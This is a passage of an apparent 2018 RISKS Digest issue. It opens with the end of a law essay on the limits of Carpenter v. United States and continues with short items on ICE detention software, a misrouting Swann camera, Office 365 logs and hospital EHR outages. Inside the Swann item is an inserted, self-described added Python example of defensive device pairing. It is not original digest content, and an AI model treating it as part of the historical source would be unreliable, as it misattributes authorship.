    difficult for citizens to obtain close judicial oversight, even when the
    police have violated the Constitution. As a result of these background
    rules, even a decision as seemingly important as Carpenter is unlikely to
    have any dramatic effect on police practices.

    It's not just that our digital privacy is insufficiently protected, in other
    words. It's that our Fourth Amendment rights and remedies in general have
    been eroded. Once enough holes have been poked in the general system for
    vindicating Fourth Amendment interests, the decision to extend Fourth
    Amendment coverage to a new domain -- such as cell-site locational data --
    is just not terribly significant.

    Timothy Ivory Carpenter had been convicted of nine armed robberies based on
    witness testimony, but the prosecution also stressed in its closing argument
    records obtained from his cellphone company. Those records showed how
    Carpenter's phone interacted with the cell phone towers that carried its
    signal. As Chief Justice Roberts emphasized, the records painted a detailed
    picture of Carpenter's movements over 127 days.

    Yet the government did not use a warrant based on probable cause to obtain
    those cell-site records, relying instead on a statute called the Stored
    Communications Act.

    Forcing police to get a warrant is not much of a protection these days

    Consider first the core constitutional protection on which Chief Justice
    Roberts's opinion in Carpenter hinged -- the requirement of a warrant based
    on probable cause from a judge before the police can acquire cell-site
    records that allow for detailed physical tracking of suspects' movements.

    From now on, the police will usually have to get a warrant before seeking
    such information. But that offers limited protection. One reason: In other
    Fourth Amendment cases, the Court has held that it is not just life-tenured
    federal judges who can issue warrants. A warrant can also be obtained from
    a range of other officials, including municipal court clerks who have no law
    training and no tenure protection. Such clerical staff lack the skills and
    incentives to examine warrant applications closely to determine compliance
    with the law. Still, they are allowed to issue warrants.

    Even where there are no such court clerks, it is well known that police and
    prosecutors go ``judge shopping'' when a physical search or arrest is in
    play. Judges have varying reputations for being more or less careful in
    scrutinizing warrant applications. It is often well known which judges in a
    city or courthouse are more or less scrupulous. When police have a weak
    warrant application, they have a strong incentive to avoid judges who will
    give it a close read.

    These weaknesses in the warrant regime for physical searches or arrests are
    exacerbated when electronic data is at issue. Warrant applications for cell
    tower records often rest on technical details about the geographic and
    temporal scope of the search. These applications might in theory seek a
    quite varied range of information, including the target's location, the
    number of calls he made, and the manner in which he used apps.

    Review of the application will also require fine judgments about when
    information can be shared with other law enforcement agencies and government
    officials. Just because a prosecutor can obtain electronic data, for
    example, that surely doesn't mean she can hand it over to, say, a political
    appointee in the White House or a Department of Transportation employee who
    happens to be the subject's boyfriend.

    Because close scrutiny by an experienced and independent judge has become so
    easy to avoid, there is no guarantee these questions will get
    careful and independent consideration -- even if a warrant is sought and
    issued consistent with the main holding of Carpenter.

    The hurdle of ``probable cause'' has also been steadily lowered

    Assume that police are before a scrupulous judge. Even then, the background
    Fourth Amendment rules mean that they have a light burden to bear. As Chief
    Justice Roberts's opinion today stresses, a warrant can be issued only based
    on ``probable cause.'' But in a series of earlier cases about physical
    searches, the Court has winnowed down the ``probable cause'' requirement to
    the showing of a mere ``fair probability'' that evidence of a crime will be
    found.

    This ``fair probability'' requirement has become easier to satisfy in recent
    decades because federal and state legislatures have created sweeping
    penalties for conspiracies to commit crimes and for accomplices.

    Showing a ``fair probability'' of a conspiracy to commit a crime is not
    difficult. Under federal law, for example, a criminal conspiracy
    exists if there's an agreement to commit any criminal act in the
    future, and one step -- even a lawful one -- taken to that end. In
    one case, for example, a Google search served as the ``overt act'' for
    an elaborate conspiracy charge, even in the absence of evidence of
    actual planned criminal conduct.

    This sweeping definition of criminal liability interacts with the weak
    ``probable cause'' rule. Police need only show a ``fair probability''
    that a single lawful action has been taken in relation to a criminal
    agreement, and they are entitled to a warrant. This is not hard to
    do.

    This problem is pervasive across Fourth Amendment law. But it has
    particular significance to cell-site locational data. Such data maps
    the movements of a group of people -- precisely the evidence that is
    routinely relevant to conspiracy charges. So with a conspiracy theory
    in hand, it will often be very easy for the police to meet the
    (exceedingly weak) probable cause standard.

    Would a warrant requirement have made a practical difference in
    Carpenter's case?

    In Carpenter's case, investigators had a confession from one of the
    participants in the string of armed robberies. They also had the cell
    numbers of other participants, including Carpenter's. These two
    pieces of information would almost certainly have been enough to allow
    the government to get a warrant on a conspiracy theory of probable
    cause.

    But imagine that the investigator couldn't even pull together evidence
    showing probable cause of a conspiracy. Imagine that they instead
    play fast and loose with the contents of the warrant application. For
    example, the application might rest on some dubious evidence, and the
    investigator might consciously choose not to confirm its accuracy.
    Once charges have been filed, could a defendant get the locational
    data thrown out on the grounds that the warrant application was based
    on false pretenses?

    Once again, general Fourth Amendment law makes this possible in theory
    but unlikely in practice. To get evidence acquired by a warrant
    tossed out of court, a defendant must show that an investigator acted
    with ``reckless disregard'' in preparing a warrant application. In most
    states and in federal court, there is no rule that permits the
    defendant to examine police or prosecutor records. Hence, the
    defendant often must make this recklessness showing without any
    documentary evidence of what the police did.

    It is therefore usually practically impossible for most defendants to
    challenge flawed search warrants. Again, warrants for electronic data
    are no different.

    Even if a defendant succeeds in getting a warrant quashed, moreover,
    the Supreme Court has said that a reviewing court of appeals must look
    again at the warrant -- now placing a thumb on the scales in favor of
    the investigating officer. In effect, when the government loses the
    rare case in which a defendant can show a warrant to be flawed, it
    gets a second chance to have the warrant restored by a court of
    appeals.

    Prosecutors can use illicitly obtained information if a suspect
    testifies

    Still, lean your imagination into the wind to imagine a defendant who
    has overcome all these constraints, and had a warrant quashed. The
    evidence from that flawed warrant can still be introduced at trial if
    the defendant chooses to testify. The Supreme Court established that
    rule in the 1971 case of Harris v. New York, on the grounds that if
    the defendant could give testimony, the government had the concomitant
    right to undermine it by whatever information was in its hands.

    As a result, even when the government has illegally acquired evidence,
    its possession of that evidence creates a strong incentive for
    defendants not to take the stand. Needless to say, this will often
    make the prosecutor's job easier.

    If a defendant chooses not to testify, that is still not the end of
    the story. The government can also argue that information gathered
    unlawfully without a warrant should be admitted because there was an
    emergency. Chief Justice Roberts explicitly carved out an emergency
    exception in his Carpenter opinion, citing the possibility of ``bomb
    threats, active shootings, and child abductions.'' In such cases, no
    warrant is required.

    Also, if the locational data was acquired without a warrant before
    Carpenter was decided, the Court held that it need not be kept out.
    Carpenter hence helps no one whose cell-site locational data was
    acquired before this week. And the Carpenter opinion also leaves open
    the possibility that police can acquire less than seven days of
    cell-site data without a warrant.

    Are there other paths for redress? Someone in Carpenter's shoes,
    whose Fourth Amendment rights have been violated, can technically sue
    the police for damages even if they are not charged with a criminal
    offense. The problem is that the Court has almost completely
    squelched the availability of damages for most constitutional wrongs,
    including the Fourth Amendment, through a series of technical
    anti-plaintiff rules.

    In short, the legal framework of Fourth Amendment remedies has been
    riddled with so many exceptions and loopholes that Carpenter's holding
    that a warrant is required to acquire cell-site locational data is
    likely to impose no great burden on the police.

    If police can't get the information through cellphone companies, they
    will turn up the heat on suspects

    But the facts around the electronic data in Carpenter make the Court's
    holding especially hollow. Locational data is held not only by the
    telephone company. It is also contained on a person's phone, even if
    she chooses to disable locational tracking. (Certain apps can track
    locational data produced by a phone's internal sensors without the
    owner's knowledge or permission.) This data is generally accurate to
    a foot or so.

    Police can thus acquire location data -- and much more -- if they ask
    for consent to examine a phone. Extensive psychological research
    shows that most of the time -- especially if the suspect is a woman or
    a racial minority -- suspects are likely to say yes.

    General Fourth Amendment law says police can seek consent to make a
    search. In the physical search context, the Court has consistently
    ignored the fact that people often feel they have no choice but to
    acquiesce.

    Consider the leading Supreme Court case on consent searches, United
    States v. Drayton. Two men are traveling by bus in Florida, when
    police board the bus and question passengers about their trip. The
    first man is asked to ``consent'' to a pat down. He does -- and the
    officer finds blocks of cocaine taped to his groin. After this first
    man is led away in handcuffs, the officer turns to his traveling
    companion and says, ``Mind if I check you?'' The second man agrees.
    Drugs are found in exactly the same spot on his body. The Supreme
    Court holds that he consented to the search.

    My students, encountering Drayton for the first time, often have a
    moment of cognitive dissonance. Why, they wonder, did the suspect
    consent after he saw what happened to his friend? When I point out
    that both men were racial minorities in a jurisdiction with a history
    of police violence, and that neither was highly educated nor socially
    privileged, then the facts start to make more sense.

    Ironically, the Carpenter decision makes it more likely that police
    will aggressively exploit the weaknesses of the Court's consent
    case-law. By making it slightly more hassle to obtain cell-site
    locational data from a telephone company, the Court has encouraged
    police to exploit the frailty of its consent doctrine. That is, by
    making it harder to acquire electronic data from a third party, the
    Court has nudged police toward more forceful and unpleasant
    confrontations with citizens by which ``consent'' can be secured.

    This should not count as a ``success'' for Fourth Amendment freedoms.

    Electronic privacy rests on the rules and remedies that apply to the
    Fourth Amendment generally. In the past 40 years, those rules and
    remedies have been substantially eroded by a Court unwilling to
    constrain police.

    The result today is that even when a decision endorses Fourth
    Amendment protection -- and requires a warrant, as in Carpenter --
    that protection is easy to avoid, and likely ineffectual in practice.

    Aziz Huq is the Frank and Bernice J. Greenberg professor of law at the
    University of Chicago Law School.

    ------------------------------

    Date: June 27, 2018 at 08:09:05 GMT+9
    From: Richard Forno <rfo...@infowarrior.org>
    Subject: ICE hacked its algorithmic risk-assessment tool, so it recommended
    detention for everyone (BoingBoing)

    ICE hacked its algorithmic risk-assessment tool so it recommended detention for everyone

    One of the more fascinating and horrible details in Reuters' thoroughly
    fascinating and horrible long-form report on Trump's cruel border policies
    is this nugget: ICE hacked the risk-assessment tool it used to decide whom
    to imprison so that it recommended that everyone should be detained.

    This gave ICE a kind of empirical facewash for its racist and inhumane
    policies: they could claim that the computer forced them to imprison people
    by identifying them as high-risk. The policy let ICE triple its detention
    rate, imprisoning 43,000 people.

    http://boingboing.net/2018/06/26/software-formalities.html

    ------------------------------

    Date: Sat, 30 Jun 2018 08:01:30 +0930
    From: Donald Mackie <don...@iconz.co.nz>
    Subject: Energy company vulnerability allows access to customer accounts

    According to this story a customer alerted the company in November 2017.
    What is interesting is the pace and incompleteness of response, lack of
    information to customers and time for a complete fix.

    Apart from the (sadly) routine nature of the vulnerability story here, one
    of the risks I see is that of testing inherited legacy systems in company
    handovers/changes. A governance and due diligence question.

    http://www.stuff.co.nz/national/stu...y-beach-admitted-as-ceo-fronts-and-apologises

    Cue A-Z of system security joke.

    ------------------------------

    Date: Wed, 27 Jun 2018 19:18:41 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Internet TV firmware update/soft powerswitch failure

    While on vacation the home we rented was equipped with all manner of
    Internet of mistakes devices, including an Internet-connected television.

    At 0200 one morning, it switched on suddenly. Apparently, the owners --
    out of convenience or pure ignorance -- elected for firmware auto-updates.

    The family was startled, as the volume had been boosted by the flash
    memory save and reboot; the legacy off-state was not restored. The
    line-of-sight TV controls remained operative.

    Although the specific TV possesses features that can auto-detect user
    inactivity after a fixed duration, or if there's an extended loss of
    input signal, I cannot help imagining if the upgrade had bricked these
    soft switches, or it possessed a ``thermal runaway'' virus maliciously
    designed to ignite the unit.

    ------------------------------

    Date: Wed, 27 Jun 2018 12:17:44 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Widespread Google Home outage: What NOT to do!

    via NNSquad

    There is apparently a widespread -- possibly global -- Google Home
    outage. However, not all units are affected. Some of my units here are
    down, at least one is up. The down units act as if they were factory
    reset and tell you to download the Home app. My recommendation is to
    NOT do so! DON'T CHANGE ANYTHING! Give Google time to deal with this
    from the server side.

    ------------------------------

    Date: Wed, 4 Jul 2018 09:13:06 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Cruel pranksters made NYC Internet kiosks play ice-cream truck tunes
    (Engadget)

    http://www.engadget.com/2018/07/03/linknyc-ice-cream-music-prank/

    ------------------------------

    Date: Wed, 27 Jun 2018 19:09:58 +0000
    From: Michael Marking <mar...@tatanka.com>
    Subject: Swann home security camera sends video to wrong user (BBC)

    http://www.bbc.co.uk/news/technology-44628399

    A leading security camera-maker has sent footage from inside a
    family's home to the wrong person's app.

    Swann Security has blamed a factory error for the data breach --
    which was brought to its attention by the BBC -- and said it was a
    ``one-off'' incident. However, last month another customer reported a
    similar problem saying his version of the same app had received
    footage from a pub's CCTV system. Swann said it was attempting to
    recover the kit involved in this second case. [...]

    The BBC first learned of the problem on Saturday, when a member of
    its staff began receiving motion-triggered video clips from an
    unknown family's kitchen. Until that point, Louisa Lewis had only
    received footage from her own Swann security camera, which she had
    been using since December. The development coincided with Ms
    Lewis's camera running out of battery power and requiring a
    recharge. [...]

    A Swann customer representative told Ms Lewis that nothing could be
    done until after the weekend. And it was only after the matter was
    flagged to the firm's PR agency on Monday that she stopped receiving
    video clips. [...]

    Even if this were a factory error, the system shouldn't have failed
    absent multiple errors: the design of the manufacturing process, even
    given active quality control, should not have been dependent on a
    single point of failure. Most important, this failure mode should not
    have been possible (ok, the likelihood shouldn't have been anything
    but vanishingly small).

    Moreover, this seems to have happened more than once.

    Designers of these systems should, at least as an exercise, treat
    manufacturers, distributors, retailers, and even users as potentially
    hostile entities. This is especially true since firms are highly
    unlikely to have ownership and control of the entire chain of
    operations. For example, the credentials for one unit might
    accidentally be swapped by a retailer for those of another. Gross
    negligence is a form of hostility, and it is grossly negligent to
    assume the absence of human error.
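    The credential-swap failure Marking describes, worked through as an added
    example that is not part of the digest, the BBC article, or any Swann code.
    It is a toy cloud-side pairing service written for this item: the names
    PairingService, device_respond and FACTORY_SECRETS, the HMAC
    challenge-response scheme, the device IDs and the secrets are all
    assumptions constructed for illustration. The design point it shows is that
    an account should be able to claim a camera only when the physical unit
    proves possession of the per-device factory secret registered under that
    ID, and only when the unit is not already bound to someone else; a swapped
    label, a mis-provisioned credential or a duplicated factory secret then fails
    closed instead of silently routing one household's clips to another's app.

```python
"""Fail-closed device-to-account binding with per-device proof of possession.

Added example, not Swann's code or the BBC's: a toy cloud pairing service for
an IoT camera. An account may claim a camera only if (1) the physical unit
proves it holds the factory secret registered under that device ID, and
(2) the unit is not already bound to another account.
"""
import hashlib
import hmac
import secrets

# Constructed factory manifest: device_id -> 32-byte per-device secret that was
# provisioned at manufacture. Real deployments would use a signed manifest or
# per-device certificates, not a dict of raw keys.
FACTORY_SECRETS = {
    "CAM-0001": bytes.fromhex("00" * 32),   # constructed
    "CAM-0002": bytes.fromhex("11" * 32),   # constructed
}


def device_respond(device_secret: bytes, device_id: str, nonce: bytes) -> bytes:
    """What the camera computes: HMAC over the challenge and its own ID."""
    return hmac.new(device_secret, nonce + device_id.encode(), hashlib.sha256).digest()


class PairingService:
    """Cloud side: challenge-response pairing and clip routing (hypothetical)."""

    def __init__(self, factory_secrets: dict):
        # Duplicate secrets (a factory error) would let two units impersonate
        # each other, so refuse to load such a manifest at all.
        if len(set(factory_secrets.values())) != len(factory_secrets):
            raise ValueError("factory manifest contains duplicated device secrets")
        self._secrets = dict(factory_secrets)
        self._bindings = {}     # device_id -> account that owns it
        self._challenges = {}   # device_id -> outstanding nonce

    def issue_challenge(self, device_id: str) -> bytes:
        nonce = secrets.token_bytes(16)
        self._challenges[device_id] = nonce
        return nonce

    def bind(self, account: str, device_id: str, response: bytes) -> bool:
        """Bind device_id to account only on a valid proof from an unbound unit."""
        secret = self._secrets.get(device_id)
        nonce = self._challenges.pop(device_id, None)   # single use
        if secret is None or nonce is None:
            return False
        expected = device_respond(secret, device_id, nonce)
        if not hmac.compare_digest(expected, response):
            return False            # the label does not match the silicon
        owner = self._bindings.get(device_id)
        if owner is not None and owner != account:
            return False            # already someone else's camera: fail closed
        self._bindings[device_id] = account
        return True

    def route_clip(self, device_id: str, clip: bytes, tag: bytes):
        """Return the account a clip is delivered to, or None if it must be dropped."""
        secret = self._secrets.get(device_id)
        if secret is None:
            return None
        expected = hmac.new(secret, clip, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            return None             # wrong secret: never deliver to anyone
        return self._bindings.get(device_id)   # None if never paired


def scenario():
    """Three pairing attempts against one CAM-0001 label, then clip routing."""
    svc = PairingService(FACTORY_SECRETS)
    cam1, cam2 = FACTORY_SECRETS["CAM-0001"], FACTORY_SECRETS["CAM-0002"]

    # 1. Legitimate owner pairs the real CAM-0001.
    n = svc.issue_challenge("CAM-0001")
    good = svc.bind("owner-a", "CAM-0001", device_respond(cam1, "CAM-0001", n))

    # 2. A second box is labelled CAM-0001 by mistake but holds CAM-0002's secret.
    n = svc.issue_challenge("CAM-0001")
    swapped = svc.bind("owner-b", "CAM-0001", device_respond(cam2, "CAM-0001", n))

    # 3. A correct proof for CAM-0001 arrives from another account: already bound.
    n = svc.issue_challenge("CAM-0001")
    rebind = svc.bind("owner-b", "CAM-0001", device_respond(cam1, "CAM-0001", n))

    # Clips from the real CAM-0001 reach owner-a; a clip from a unit that merely
    # claims the ID with the wrong secret is dropped rather than misrouted.
    clip = b"motion clip bytes (constructed)"
    delivered = svc.route_clip("CAM-0001", clip, hmac.new(cam1, clip, hashlib.sha256).digest())
    dropped = svc.route_clip("CAM-0001", clip, hmac.new(cam2, clip, hashlib.sha256).digest())
    return good, swapped, rebind, delivered, dropped


def duplicate_manifest_rejected() -> bool:
    """A manifest with two units sharing one secret must not load."""
    try:
        PairingService({"CAM-A": b"\x00" * 32, "CAM-B": b"\x00" * 32})
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(scenario())                   # (True, False, False, 'owner-a', None)
    print(duplicate_manifest_rejected())  # True
```

    The two checks in bind() are independent on purpose: proof of possession
    catches a label that does not match the unit, and the ownership check
    catches a correct unit being claimed twice, so no single mistake in the
    factory, the retailer or the app can by itself redirect footage.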

    ------------------------------

    Date: Thu, 28 Jun 2018 12:08:17 +0200
    From: Peter Houppermans <pe...@houppermans.net>
    Subject: Hidden Microsoft Office 365 data gathering (LMG Security)

    I came across this interesting post:

    http://lmgsecurity.com/exposing-the-secret-office-365-forensics-tool/

    Extract: ``An ethical crisis in the digital forensics industry came to a
    head last week with the release of new details on Microsoft's undocumented
    `Activities' API. A previously unknown trove of access and activity logs
    held by Microsoft allows investigators to track Office 365 mailbox activity
    in minute detail. Following a long period of mystery and rumors about the
    existence of such a tool, the details finally emerged, thanks to a video by
    Anonymous and follow-up research by CrowdStrike.

    Now, investigators have access to a stockpile of granular activity data
    going back six months -- even if audit logging was not enabled. For victims
    of Business Email Compromise (BEC), this is huge news, because investigators
    are now far more likely to be able to `rule out' unauthorized access to
    specific emails and attachments.''

    Maybe I'm just picky, but I like to know what software is logging what
    activity, due to compliance and confidentiality needs. The two are
    frequently in conflict, so precision is essential.

    From a privacy perspective, it appears it's time to revert to parchment,
    quill and ink.

    ------------------------------

    Date: Tue, 3 Jul 2018 18:24:27 -0700
    From: Rob Slade <rms...@shaw.ca>
    Subject: Protecting civilians in cyberspace (Just Security)

    Over the years, we've explored (and often shied away from) the idea of
    infosec pros as a kind of military or police force, protecting the general
    public from the digital/cybersecurity bad guys.

    So I find this article on protecting civilians in cyberspace, seemingly by
    people outside the traditional infosec community, quite interesting. The
    emphasis seems to be on human rights, rather than general computer use, but
    there are some intriguing ideas just the same.

    http://www.justsecurity.org/58838/protecting-civilians-cyberspace-ideas-road/

    [Interesting name. It is Never *Just* Security, as (1) it is often
    something else as well, and (2) Security is never Just. PGN]

    ------------------------------

    Date: Tue, 3 Jul 2018 20:27:56 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Rash of Fortnite cheaters infected by malware that breaks HTTPS
    encryption (Ars Technica)

    Malware can read, intercept, or tamper with the traffic of any
    HTTPS-protected site.

    http://arstechnica.com/information-...cted-by-malware-that-breaks-https-encryption/

    ------------------------------

    Date: Tue, 3 Jul 2018 20:26:39 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Really dumb malware targets cryptocurrency fans using Macs
    (Ars Technica)

    A command spread through Slack and Discord channels to cryptocurrency users
    is a trap.

    http://arstechnica.com/information-...lware-targets-cryptocurrency-fans-using-macs/

    ------------------------------

    Date: Tue, 3 Jul 2018 17:43:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Sony Blunders By Uploading Full Movie to YouTube Instead of Trailer
    (TorrentFreak)

    Sony Pictures Entertainment's movie `Khali the Killer' is on release in the
    United States and, as is customary, a trailer has been uploaded to YouTube.
    However, on closer inspection, it appears that Sony uploaded the entire
    movie in error. Oops.

    http://torrentfreak.com/sony-blunders-uploading-full-movie-youtube-instead-trailer-180703/
    The price is right...

    [Monty Solomon noted this item:
    http://arstechnica.com/gaming/2018/...railer-to-youtube-posts-entire-movie-instead/
    PGN]

    ------------------------------

    Date: Mon, 2 Jul 2018 15:04:13 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Homeland Security subpoenas Twitter for data breach finder's account
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 2 Jul 2018
    http://www.zdnet.com/article/homeland-security-subpoenas-twitter-for-data-breach-finders-account/

    Homeland Security has served Twitter with a subpoena, demanding the account
    information of a data breach finder, credited with finding several large
    caches of exposed and leaking data.

    The New Zealand national, whose name isn't known but goes by the handle
    Flash Gordon, revealed the subpoena in a tweet last month.

    Also: Homeland Security's own IT security is a hot mess, watchdog finds

    The pseudonymous data breach finder regularly tweets about leaked data found
    on exposed and unprotected servers. Last year, he found a trove of almost a
    million patients' data leaking from a medical telemarketing firm. A recent
    find included an exposed cache of law enforcement data by ALERRT, a Texas
    State University-based organization, which trains police and civilians
    against active shooters. The database, secured in March but reported last
    week, revealed that several police departments were under-resourced and
    unable to respond to active shooter situations.

    Homeland Security's export control agency, Immigration and Customs
    Enforcement (ICE), served the subpoena to Twitter on April 24, demanding
    information about the data breach finder's account.

    [Also noted by Gene Wirchenko. PGN]

    ------------------------------

    Date: Tue, 3 Jul 2018 08:39:56 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Wikipedia Italy Blocks All Articles in Protest of EU's Ruinous
    Copyright Proposals (Gizmodo)

    NNSquad
    http://gizmodo.com/wikipedia-italy-blocks-all-articles-in-protest-of-eus-r-1827312550

    On Tuesday, Wikipedia Italy set all of its pages to redirect to a
    statement raising awareness for the upcoming vote that (barring some
    legislative wrangling) would make the copyright directive law. The
    statement reads, in part (emphasis theirs): On July 5, 2018, The Plenary
    of the European Parliament will vote whether to proceed with a copyright
    directive proposal which, if approved, will significantly harm the
    openness of the Internet. The directive instead of updating the copyright
    laws in Europe and promoting the participation of all the citizens to the
    society of information, threatens online freedom and creates obstacles to
    accessing the Web, imposing new barriers, filters and restrictions. If the
    proposal would be approved in its current form, it could be impossible to
    share a news article on social networks, or find it through a search
    engine; Wikipedia itself would be at risk.

    Just a taste of what's coming to European Internet users if those laws
    are enacted.

    ------------------------------

    Date: Mon, 2 Jul 2018 23:45:55 -0400
    From: ``Fr. Stevan Bauman'' <father...@indy.net>
    Subject: How a Major Computer Crash Showed the Vulnerabilities of EHRs
    (Medscape)

    Marcia Frellick, Medscape, 14 Jun 2018
    http://www.medscape.com/viewarticle...PEDIT_hospmed&uac=64984BJ&impID=1667063&faf=1

    The recent communications outage at Sutter Health, the largest health system
    in northern California, which cut off access to electronic health records
    (EHRs), highlighted the frequency of such outages and the need for backup
    plans and drills nationwide. [...]

    Andrew Gettinger, MD, chief clinical officer for the Office of the National
    Coordinator for Health Information Technology, part of the US Department of
    Health and Human Services, said all systems need backup plans and pointed to
    the recommendation from the Joint Commission for annual disaster drills.

    ``It's not a question of IS your system going to be unavailable, because I
    think almost every computer system in every context is at some time or
    another not available,'' he told /Medscape Medical News/. ``The question is
    then -- what's the institutional contingency plan?''

    Gettinger said that downtime for computer systems is not unlike other
    disasters health systems plan for regularly. ``It's no different from what
    happens when the power in the building goes out or the water supply goes out
    or you're no longer able to get compressed oxygen or nitrous oxide. I don't
    think patients or doctors really need to be worried about it unnecessarily.''

    All health systems should know about the SAFER guides
    <https://www.healthit.gov/topic/safety/safer-guides>
    (Safety Assurance Factors for EHR Resilience), put in place to address EHR
    safety nationally, Gettinger said. The guides were updated last year.

    Dean Sittig, PhD, a professor at the University of Texas Health's School of
    Biomedical Informatics, helped write those guidelines and also was lead
    author on a study in 2014 <https://www.ncbi.nlm.nih.gov/pubmed/25200197>
    that surveyed US-based healthcare institutions that were part of a
    professional collaborative on their exposure to downtime.

    In that study, researchers found that nearly all (96%) of the 50 large,
    integrated institutions who responded had at least one unplanned downtime in
    the past 3 years and 70% had at least one unplanned downtime greater than 8
    hours in the past 3 years. [...]

    In another paper
    http://www.nejm.org/doi/full/10.1056/NEJMsb1205420
    Sittig wrote that, in April 2010, one third of the hospitals in Rhode Island
    had to delay elective surgeries and divert some patients when an automatic
    antivirus update crashed the system.

    ``You depend on the computer for everything -- registration, scheduling, past
    visit notes, results of laboratory tests. The healthcare system is now
    dependent on the electronic health record to care for patients,'' Sittig told
    /Medscape Medical News/.

    In the Sutter case, a fire-suppression system was activated. Sittig
    explained that the suppression systems in data centers typically involve an
    alarm going off to alert people to get out of the room, then doors lock and
    all the oxygen is sucked out of the room and replaced with fire-retardant
    gas.

    Because the gas has to be flushed out, then the oxygen levels restored, then
    the computers restarted, ``you're talking probably a minimum of 4-6 hours,''
    Sittig says. ``That's when everything works perfectly.'' He said systems
    should expect accidents to happen and that they will be costly. ``A big
    hospital probably loses at least $1 million per hour when they're down,''
    Sittig said.

    But investments in data protection can be a hard sell. A chief financial
    officer, Sittig said, may say a $3 million backup data center is too
    expensive, for example.

    ``You have to ask them, 'Can you afford to be down 5 hours? That will cost us
    $5 million. So we should spend the $3 million as an insurance policy,' ''
    Sittig said.

    Adding to the problem, he said, is that in the modern healthcare system,
    with an institution that's been using an EHR 5 or more years, many young
    providers have never worked in a place that has a paper system and aren't
    familiar with those operations.

    Sittig added that paper systems are subject to their own dangers -- fire,
    water, and wind, for example.

    But electronic records that make it easy to spread information instantly
    across hospitals, sometimes in many states, also can mean instant, massive
    failures.

    The first thing hospital systems do when a disaster strikes, Sittig says, is
    decide what can be cut, and the first thing to go is usually the elective
    surgeries. Then ambulances may be instructed to take patients elsewhere.
    ``Then you try to discharge the people who aren't very sick. Then they start
    sending people home early. We've created a system where we're relying on an
    electromechanical device that we know is going to break. There's no question
    computers are going to break.''

    ------------------------------

    Date: Sat, 30 Jun 2018 23:13:48 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Apple 'Family Sharing' feature used by scammers to make purchases
    with hacked Apple IDs (Business Insider)

    People are discovering that scammers are controlling their Apple accounts
    using a feature for families to share apps

    When David tried to download apps on his iPhone and iPad recently, he found
    he wasn't able to because his account was linked to something called *Family
    Sharing*.

    That's a feature that Apple introduced in 2014 to make it easier to share
    apps, iCloud storage, and iTunes content like music and movies with up to
    five family members.

    But this was news to David, who says he didn't remember turning on Family
    Sharing. After he dug into his account settings, he received a popup that to
    remove himself from the Family Sharing account he needed to contact a name
    that was in Chinese -- and he had no way to get in touch.

    http://www.businessinsider.com/appl...mers-to-make-purchases-hacked-accounts-2018-6

    ------------------------------

    Date: Tue, 03 Jul 2018 18:50:25 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: ``Trump administration tells FCC to block China Mobile from U.S.''
    (Corinne Reichert)

    Corinne Reichert, ZDNet, 3 Jul 2018
    Mobile access to U.S. telecommunications networks would carry a `substantial
    and unacceptable risk' to national security and law enforcement, the U.S.
    government has said.
    http://www.zdnet.com/article/trump-administration-tells-fcc-to-block-china-mobile-from-us/

    selected text:

    The Federal Communications Commission (FCC) has been advised by the
    Executive Branch to deny China Mobile entry to the United States
    telecommunications industry, citing ``substantial and unacceptable risk to US
    law enforcement and foreign intelligence collection''.

    The Executive Branch, which includes the Departments of Justice, Homeland
    Security, Defense, State, and Commerce, along with the Offices of Science
    and Technology Policy and the US Trade Representative, made the
    recommendation almost seven years after China Mobile International (USA)
    made the application for a certificate under s214 of the Communications Act.

    A 2013 letter [PDF] from counsel for China Mobile USA had noted the ``extreme
    delay'' in granting the licence -- which was originally applied for in
    September 2011 -- saying the delay ``is causing significant and unwarranted
    harm to China Mobile USA's business operations''.

    Huawei Australian chair John Lord last week said the Chinese technology
    giant is the most audited, inspected, reviewed, and critiqued IT company in
    the world, and has never had a national security issue.

    ``After every kind of inspection, audit, review, nothing sinister has
    been found. No wrongdoing, no criminal action or intent, no 'back
    door', no planted vulnerability, and no 'magical kill switch'. In
    fact, in our three decades as a company no evidence of any sort has
    been provided to justify these concerns by anyone -- ever.''

    ------------------------------

    Date: Sat, 30 Jun 2018 13:41:59 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Google is training machines to predict when a patient will die
    (Los Angeles Times)

    http://www.latimes.com/business/tec...l-intelligence-healthcare-20180618-story.html

    ``What impressed medical experts most was Google's ability to sift through
    data previously out of reach: notes buried in PDFs or scribbled on old
    charts. The neural net gobbled up all this unruly information then spat
    out predictions. And it did so far faster and more accurately than
    existing techniques. Google's system even showed which records led it to
    conclusions.

    ``Dean envisions the AI system steering doctors toward certain medications
    and diagnoses. Another Google researcher said existing models miss obvious
    medical events, including whether a patient had prior surgery. The person
    described existing hand-coded models as `an obvious, gigantic roadblock'
    in healthcare. The person asked not to be identified discussing work in
    progress.

    ``For all the optimism over Google's potential, harnessing AI to improve
    healthcare outcomes remains a huge challenge. Other companies, notably
    IBM's Watson unit, have tried to apply AI to medicine but have had limited
    success saving money and integrating the technology into reimbursement
    systems.''

    The perfect *death panel* proxy, and no longer a burden to physicians,
    bioethicists, insurance agents, hospital administrators, and patient
    advocates, Google's Medical Brain AI platform calculates a human life's
    merit score.

    Can this platform factor patient quality of life outcome potential into the
    learning algorithm's neural network processing decisions? What weight would
    this factor possess relative to the others? Under what medical conditions is
    this platform relevant to even consult? What happens if a test result
    applied as an input, such as for blood chemistry, is skewed by a
    contaminated reagent?

    Until proven to improve health care outcomes, if ever, a ``blackbox
    warning label'' seems like a wise precaution.
    http://en.wikipedia.org/wiki/Boxed_warning.

    Will Google's Medical Brain employees and immediate family members be
    required to participate in a randomized control trial using the Medical Brain
    AI platform?

    ------------------------------

    Date: July 4, 2018 at 10:18:15 AM GMT+9
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: So What The Heck Does 5G Actually Do? And Is It Worth What The Carriers
    Are Demanding? (Harold Fel)

    Harold Fel, WetMachine, 28 Jun 2018

